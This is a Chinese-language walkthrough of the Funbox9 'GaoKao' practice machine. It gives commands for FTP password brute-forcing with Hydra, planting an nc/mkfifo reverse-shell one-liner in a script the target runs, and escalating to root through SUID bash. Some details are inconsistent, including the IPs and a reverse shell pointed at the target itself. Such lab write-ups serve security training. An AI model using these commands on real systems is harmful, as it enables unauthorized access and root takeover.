Funbox9_GaoKao通过NC获取反向shell

一. 发现主机

arp-scan -l -I eth0
找打GaoKao主机IP地址 173.30.1.128

二. Nmap扫描主机

nmap -A -T5 172.30.1.128
-A ：系统探测，版本检测，脚本扫描，路由跟踪
-T(0-5)：数字越大速度越快(准确度低)，数字越小速度越慢(准确度高)
-p- ：代表扫描所有端口
我们发现ftp服务是支持匿名访问的

三. 访问FTP服务获取信息

ftp 172.30.1.128
默认用户名输入 ftp
默认密码ftp
我们发现有个sky的邮箱，地址我们可以尝试对这个用户名进行枚举爆破

四. 通过Hydra进行枚举爆破

hydra -v -l sky -P /usr/share/wordlists/rockyou.txt ftp://172.30.1.128
-v ：显示详细信息
-l ：用命
-P：密码字典
这里我们得到了sky的密码为thebest

五. 登录ftp中的sky用户

在这里我们可以发现有一个user.flag的文件我门将它下载到我们的/tmp目录下，并且我们发现sky用户对这个文件有读写功能
lcd /tmp 切换本地目录
get user.flag 下载文件

我们发现这是一个脚本文件

写入nc反弹的shell的脚本
rm -rf /tmp/p; mkfifo /tmp/p;cat /tmp/p | sh -i 2>&1 | nc -nv 172.30.1.128 4444 > /tmp/p ;rm -rf /tmp/p
sh -i ：反弹一个交互sehll
vim user.flag
写入脚本

开启kail中nc的服务端和上传user.flag脚本文件到ftp上

kail开启nc监听服务
nc -lvnp 4444

上传脚本文件到ftp服务器覆盖掉源文件
put user.flag user.flag

获取到shell完成

suid 提权

suid 是linux的一种提权机制，具有这种权限的文件会在执行时，使调用者暂时获得该文件拥有者的权限。如果拥有suid权限，那么就可以利用系统中的二进制文件和工具来进行root提权。
liunx命令提权参考网站：GTFOBins

通过find命令查询系统上运行的所有suid可执行文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find /-user root -perm -4000 -exec ls -ldb {} \ ;

我们可以通过GTFOBin网站查询可以用的提权命令
比如/bin/bash
/bin/bash -p


/root/root.flag 完成